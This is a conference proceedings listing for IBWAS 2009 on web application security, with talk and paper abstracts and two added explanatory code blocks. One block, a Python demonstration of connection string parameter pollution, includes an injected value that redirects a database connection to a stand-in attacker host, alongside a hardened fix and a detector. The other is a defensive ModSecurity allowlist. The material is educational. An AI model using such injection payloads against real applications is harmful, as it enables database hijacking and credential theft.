
2010 | Book

Web Application Security

Iberic Web Application Security Conference, IBWAS 2009, Madrid, Spain, December 10-11, 2009. Revised Selected Papers

Edited by: Carlos Serrão, Vicente Aguilera Díaz, Fabio Cerullo

Publisher: Springer Berlin Heidelberg

Book series: Communications in Computer and Information Science


About this book

IBWAS 2009, the Iberic Conference on Web Applications Security, was the first international conference organized by both the OWASP Portuguese and Spanish chapters in order to join the international Web application security academic and industry communities to present and discuss the major aspects of Web applications security.

There is currently a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the extensive deployment and use of Web-based applications and Web services as a way to develop new and flexible information systems. Such systems are easy to develop, deploy and maintain and they demonstrate impressive features for users, resulting in their current wide use. The “social” features of these technologies create the necessary “massification” effects that make millions of users share their own personal information and content over large web-based interactive platforms. Corporations, businesses and governments all over the world are also developing and deploying more and more applications to interact with their businesses, customers, suppliers and citizens to enable stronger and tighter relations with all of them. Moreover, legacy non-Web systems are being ported to this new intrinsically connected environment.

IBWAS 2009 brought together application security experts, researchers, educators and practitioners from industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track, academic researchers were able to combine interesting results with the experience of practitioners and software engineers.

Table of contents

Frontmatter

Abstracts

The OWASP Logging Project
Abstract
The presentation explained current shortcomings of Security Information Management systems. A new solution and a working prototype were presented.
In current Security Information Management Systems it is difficult to obtain relevant views of consolidated data (for instance alarms concerning different clients and different Data Centres over different periods of time), difficult to calculate essential indicators for management (such as risk indicators like Annual Loss Expectancy for Assets and the cost effectiveness of proposed safeguards), and difficult to compare with historical data; there are also some severe performance issues.
Marc Chisinevski
SQL Injection - How Far Does the Rabbit Hole Go?
Abstract
SQL Injection has been around for over 10 years, and yet to this day it is still not truly understood by many security professionals and developers. With the recent mass attacks against sites across the world, and well-publicised data breaches with SQL Injection as a component, it has again come to the fore of vulnerabilities under the spotlight; however, many consider it to be only a data access issue, or parameterized queries to be a panacea. This talk explores the deeper, darker areas of SQL Injection: hybrid attacks, SQL Injection worms, and exploiting database functionality. It also explores what kinds of things we can expect in future.
Justin Clarke
OWASP O2 Platform - Open Platform for Automating Application Security Knowledge and Workflows
Abstract
In this talk Dinis Cruz will show the OWASP O2 Platform, an open source toolkit specifically designed for developers and security consultants to be able to perform quick, effective and thorough ’source-code-driven’ application security reviews. The OWASP O2 Platform (http://www.owasp.org/index.php/OWASP_O2_Platform) consumes results from the scanning engines from Ounce Labs, Microsoft’s CAT.NET tool, FindBugs, CodeCrawler and AppScan DE, and also provides limited support for Fortify and OWASP WebScarab dumps. In the past, there has been a very healthy skepticism about the usability of source code analysis engines to find commonly found vulnerabilities in real world applications. This presentation will show that with some creative and powerful tools, it IS possible to use O2 to discover those issues. This presentation will also show O2’s advanced support for Struts and Spring MVC.
Dinis Cruz
The Business of Rogueware
Abstract
The growth and complexity of the underground cybercrime economy have increased significantly over the past couple of years due to a variety of factors including the rise of social media tools, the global economic slowdown, and an increase in the total number of Internet users. For the past 3 years, PandaLabs has monitored the ever-evolving cybercrime economy to discover its tactics, tools, participants, motivations and victims to understand the full extent of criminal activities and ultimately bring an end to the offenses. In October of 2008, PandaLabs published findings from a comprehensive study on the rogueware economy, which concluded that the cybercriminals behind fake antivirus software applications were generating upwards of $15 million per month. In July of 2009, it released a follow-on study that showed monthly earnings had more than doubled to approximately $34 million through rogueware attacks distributed via Facebook, MySpace, Twitter, Digg and targeted Blackhat SEO. This session will reveal the latest results from PandaLabs’ ongoing study of the cybercrime economy by illustrating the latest malware strategies used by criminals and examining the changes in their attack strategies over time. The goal of this presentation is to raise awareness of this growing underground economy.
Luis Corrons
Microsoft Infosec Team: Security Tools Roadmap
Abstract
Microsoft IT’s Information Security (InfoSec) group is responsible for information security risk management at Microsoft. We concentrate on the data protection of Microsoft assets, business and enterprise. Our mission is to enable secure and reliable business for Microsoft and its customers. We are an experienced group of IT professionals including architects, developers, program managers and managers.
This talk will present different technologies developed by InfoSec to protect Microsoft and released for free, such as CAT.NET, SPIDER, SDR, TAM and SRE, and how they fit into the SDL (Security Development Lifecycle).
Simon Roses
Empirical Software Security Assurance
Abstract
By now everyone knows that security must be built in to software; it cannot be bolted on. For more than a decade, scientists, visionaries, and pundits have put forth a multitude of techniques and methodologies for building secure software, but there has been little to recommend one approach over another or to define the boundary between ideas that merely look good on paper and ideas that actually get results. The alchemists and wizards have put on a good show, but it’s time to look at the real empirical evidence.
This talk examines software security assurance as it is practiced today. We will discuss popular methodologies and then, based on in-depth interviews with leading enterprises such as Adobe, EMC, Google, Microsoft, QUALCOMM, Wells Fargo, and Depository Trust Clearing Corporation (DTCC), we present a set of benchmarks for developing and growing an enterprise-wide software security initiative, including but not limited to integration into the software development lifecycle (SDLC). While all initiatives are unique, we find that the leaders share a tremendous amount of common ground and wrestle with many of the same problems. Their lessons can be applied in order to build a new effort from scratch or to expand the reach of existing security capabilities.
Dave Harper
Assessing and Exploiting Web Applications with the Open-Source Samurai Web Testing Framework
Abstract
The Samurai Web Testing Framework (WTF) is an open-source LiveCD based on Ubuntu and focused on web application security testing. It includes an extensive collection of pre-installed and pre-configured top penetration testing and security analysis tools, becoming the perfect environment for assessing and exploiting web applications. The tools categorization guides the analyst through the web-app penetration testing methodology, from reconnaissance, to mapping, discovery and exploitation. The project web page is http://sf.net/projects/samurai/.
Raul Siles
Authentication: Choosing a Method That Fits
Abstract
Over the last five years, we in the security field have been witnessing an increase in the number of attacks on (web) application users’ credentials, and in the refinement and sophistication these attacks have been gaining. There are currently several methods and mechanisms to increase the strength of the authentication process for web applications, both to improve user authentication and to improve transaction authentication. As an example, one can think of adding one-time password tokens, digital certificates, EMV cards, or even SMS one-time codes. However, none of these methods comes for free, nor do they provide perfect security. One must also consider usability penalties, mobility constraints, and, of course, the direct costs of the gadgets. Moreover, there is evidence that not all kinds of attacks can be stopped by even the most sophisticated of these methods. So, where do we stand? What should we choose? What kind of gadgets should we use for our business-critical app, how much will they increase the costs and reduce the risk, and, last but not least, what kinds of attacks will we be unable to stop anyway? This presentation will focus on ways to evaluate the pros and cons of adding these improvements, given the current threats.
Miguel Almeida
Cloud Computing: Benefits, Risks and Recommendations for Information Security
Abstract
The presentation “Cloud Computing: Benefits, risks and recommendations for information security” will cover some of the most relevant information security implications of cloud computing from the technical, policy and legal perspectives.
Information security benefits and top risks will be outlined and, most importantly, concrete recommendations on how to address the risks and maximise the benefits for users will be given.
Daniele Catteddu
OWASP TOP 10 2009
Abstract
The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic methods to protect against these high risk problem areas –and provides guidance on where to go from here.
The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003; minor updates were made in 2004 and 2007, followed by this 2010 release. We encourage you to use the Top 10 to get your organization started with application security.
Fabio E. Cerullo
Deploying Secure Web Applications with OWASP Resources
Abstract
Secure applications do not just happen – they are the result of an organization deciding that it will produce secure applications. OWASP does not wish to force a particular approach or require an organization to take up compliance with laws that do not affect it, as every organization is different.
Fabio E. Cerullo
Threat Risk Modelling
Abstract
How secure must an application be? To take the appropriate measures we have to identify the risks first and think about the measures later. Threat risk modelling is an essential process for secure web application development. It allows organizations to determine the correct controls and to produce effective countermeasures within budget. This presentation is about how to do Threat Risk Modelling: what is needed to start and where to go from there!
Martin Knobloch
Protection of Applications at the Enterprise in the Real World: From Audits to Controls
Abstract
This talk is about securing application development in the enterprise world, where applications range from small in-house applications developed by a small department to large applications developed through an outsourcing company in a project spanning several years. In addition, applications that initially were not considered critical suddenly become part of a critical process, or applications that were going to be used in a small and limited internal environment suddenly get promoted and published as a new service on the Internet.
To get a better feeling of what works and what does not work in the harsh world outside, this talk will present examples of do’s and don’ts coming from real world projects attempting to protect security applications in different stages: from the introduction of technical measures to prevent abuse of Internet-facing applications to source-code driven application security testing.
Javier Fernández-Sanguino

Papers

A Semantic Web Approach to Share Alerts among Security Information Management Systems
Abstract
This paper presents a semantic web-based architecture to share alerts among Security Information Management Systems (SIMS). Such architecture is useful if two or more SIMS from different domains need to know information about alerts happening in the other domains, which is useful for an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that contains the security alerts. These knowledge bases can be queried from other SIMS, using standard semantic web protocols. Two modules have been implemented: one to insert the new security alerts in the knowledge base, and another one to query such knowledge bases. The performance of both modules has been evaluated, providing some results.
Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz
WASAT - A New Web Authorization Security Analysis Tool
Abstract
WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed for assessing the security of different web-related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute force attacks of variable complexity against the target web site. Password files incorporate a syntax to generate different password search spaces. An important feature of this tool is that low-signature attacks can be performed in order to avoid detection by anti-brute-force mechanisms. The tool is platform-independent and multithreaded, allowing the user to take control of the program speed. WASAT provides some features not included in many of the existing similar applications and hardly any of their drawbacks, making it an excellent tool for security analysis.
Carmen Torrano-Gimenez, Alejandro Perez-Villegas, Gonzalo Alvarez
Connection String Parameter Pollution Attacks
Abstract
In 2007 the classification of the ten most critical vulnerabilities for the security of a system established that code injection attacks were the second most common type of attack, behind XSS attacks. Currently, code injection attacks are placed first in this ranking. In fact, the most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. The potential damage associated with this type of threat, the total absence of background, and the fact that the solution to mitigate this vulnerability must be implemented by systems administrators and the database vendors justify an in-depth analysis to estimate all the possible ways of implementing this attack technique.
Chema Alonso, Manuel Fernandez, Alejandro Martín, Antonio Guzmán
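As an added illustration of the attack class named in this paper's title (editorial example code, not code from the paper): ADO.NET-style connection strings are semicolon-separated key=value pairs, and when a key is repeated the value of the last occurrence is used, so untrusted input concatenated into the string can override parameters set earlier by the application. The toy parser below models that documented last-wins behaviour; the host names, parameter names and the attacker payload are constructed for this example.

```python
"""Toy model of ADO.NET-style connection-string parsing, used to show
Connection String Parameter Pollution (CSPP). Added example; the parser is a
simplification of the documented rules (';' separates pairs, a repeated key
takes the last value, values may be wrapped in ' or " and an embedded quote
character is escaped by doubling it)."""


def _tokens(cs):
    """Yield (key, value) pairs in order of appearance; keys are case-insensitive."""
    i, n = 0, len(cs)
    while i < n:
        while i < n and cs[i] in " ;":          # skip separators / padding
            i += 1
        if i >= n:
            return
        eq = cs.find("=", i)
        if eq == -1:
            raise ValueError("malformed connection string: missing '='")
        key = cs[i:eq].strip().lower()
        i = eq + 1
        while i < n and cs[i] == " ":
            i += 1
        if i < n and cs[i] in "'\"":             # quoted value: ';' inside is literal
            q = cs[i]
            i += 1
            buf = []
            while i < n:
                if cs[i] == q:
                    if i + 1 < n and cs[i + 1] == q:   # doubled quote -> literal quote
                        buf.append(q)
                        i += 2
                        continue
                    i += 1                              # closing quote
                    break
                buf.append(cs[i])
                i += 1
            value = "".join(buf)
            while i < n and cs[i] != ";":       # ignore anything up to the next ';'
                i += 1
        else:                                    # bare value runs to the next ';'
            end = cs.find(";", i)
            if end == -1:
                end = n
            value = cs[i:end].strip()
            i = end
        yield key, value


def parse_connection_string(cs):
    """Last occurrence of a key wins, as in the real parser."""
    params = {}
    for key, value in _tokens(cs):
        params[key] = value
    return params


def duplicate_keys(cs):
    """Keys that appear more than once: a cheap CSPP indicator for logging or review."""
    seen = {}
    for key, _ in _tokens(cs):
        seen[key] = seen.get(key, 0) + 1
    return [k for k, c in seen.items() if c > 1]


def quote(value):
    """Wrap a value in single quotes, doubling any embedded single quote."""
    return "'" + value.replace("'", "''") + "'"


# Assumed application: user-supplied credentials are placed into the string.
# Hostname db.internal.example is a placeholder.
def build_vulnerable(user, password):
    # Untrusted input is concatenated unquoted: the CSPP-prone pattern.
    return ("Data Source=db.internal.example;Initial Catalog=app;"
            f"User ID={user};Password={password}")


def build_hardened(user, password):
    # Every untrusted value is quoted, so an injected ';' stays inside the value.
    return ("Data Source=db.internal.example;Initial Catalog=app;"
            f"User ID={quote(user)};Password={quote(password)}")


# Constructed attacker payload: redirects the connection to a host the attacker controls.
PAYLOAD = "x;Data Source=attacker.example;Integrated Security=true"

if __name__ == "__main__":
    print(parse_connection_string(build_vulnerable("app", PAYLOAD)))
    print(duplicate_keys(build_vulnerable("app", PAYLOAD)))
    print(parse_connection_string(build_hardened("app", PAYLOAD)))
```

With the vulnerable builder the parsed `data source` becomes `attacker.example` and an `integrated security` key the application never set appears; with the hardened builder the whole payload is just the password and `duplicate_keys` returns nothing. In real code the equivalent of `build_hardened` is the platform's connection-string builder class rather than hand-written quoting.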
Web Applications Security Assessment in the Portuguese World Wide Web Panorama
Abstract
Following the EU Information and Communication Technologies agenda, the Portuguese Government has started the creation of many applications, enabling electronic interaction between individuals, companies and the public administration – the e-Government. Due to the Internet open nature and the sensitivity of the data that those applications have to handle, it is important to ensure and assess their security. Financial institutions, such as banks, that nowadays use the WWW as a communication channel with their customers, face the same challenges.
The main objective of this paper is to introduce work that will be performed to assess the security of the financial and public administration sectors’ web applications. In this paper the authors describe the rationale behind this work, which involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation of the assessment results.
Nuno Teodoro, Carlos Serrão
Building Web Application Firewalls in High Availability Environments
Abstract
The number of Web applications and Web services increases every day due to the migration that is occurring towards this type of environment. In these scenarios it is very common to find all types of vulnerabilities affecting web applications, and traditional methods of protection at the network and transport level are not enough to mitigate them. What is more, there are also situations where the availability of information systems is vital for proper functioning. To protect our systems from these threats, we need a component acting on layer 7 of the OSI model, which includes the HTTP protocol, that allows us to analyze HTTP and HTTPS traffic and that is easily scalable. To solve these problems, the paper presents the design and implementation of an Open Source application firewall, ModSecurity, emphasizing the use of the positive security model and deployment in high availability environments.
Juan Galiana Lara, Àngel Puigventós Gracia
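As an added illustration of the positive security model the paper emphasises (editorial example, not configuration from the paper): instead of matching known-bad patterns, the rules below describe what a single endpoint is allowed to receive and deny everything else. ModSecurity 2.x syntax; the `/login` path, the parameter names and the formats are assumptions for this example, and the rule ids are arbitrary.

```apache
SecRuleEngine On
SecRequestBodyAccess On
# Anything a rule matches is denied unless the rule says otherwise.
SecDefaultAction "phase:2,deny,status:403,log"

<Location /login>
    # Only POST is accepted on this endpoint.
    SecRule REQUEST_METHOD "!@streq POST" \
        "id:100001,phase:1,deny,status:405,msg:'Method not allowed on /login'"

    # Only the expected parameter names may appear (any other name is a match, hence denied).
    SecRule ARGS_NAMES "!@rx ^(username|password|csrf_token)$" \
        "id:100002,phase:2,deny,msg:'Unexpected parameter on /login'"

    # Each expected parameter must match its allowed format.
    SecRule ARGS:username "!@rx ^[A-Za-z0-9._-]{3,32}$" \
        "id:100003,phase:2,deny,msg:'Bad username format'"
    SecRule ARGS:password "!@rx ^.{8,128}$" \
        "id:100004,phase:2,deny,msg:'Bad password length'"
    SecRule ARGS:csrf_token "!@rx ^[A-Fa-f0-9]{32,64}$" \
        "id:100005,phase:2,deny,msg:'Bad CSRF token format'"
</Location>
```

The allowlist has to be maintained alongside the application, so in practice it is built per endpoint from the application's own input specification and rolled out in `SecRuleEngine DetectionOnly` first; in a high-availability deployment the same rule set must be identical on every node behind the load balancer.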
Backmatter
Metadata
Title
Web Application Security
Edited by
Carlos Serrão
Vicente Aguilera Díaz
Fabio Cerullo
Copyright year
2010
Publisher
Springer Berlin Heidelberg
Electronic ISBN
978-3-642-16120-9
Print ISBN
978-3-642-16119-3
DOI
https://doi.org/10.1007/978-3-642-16120-9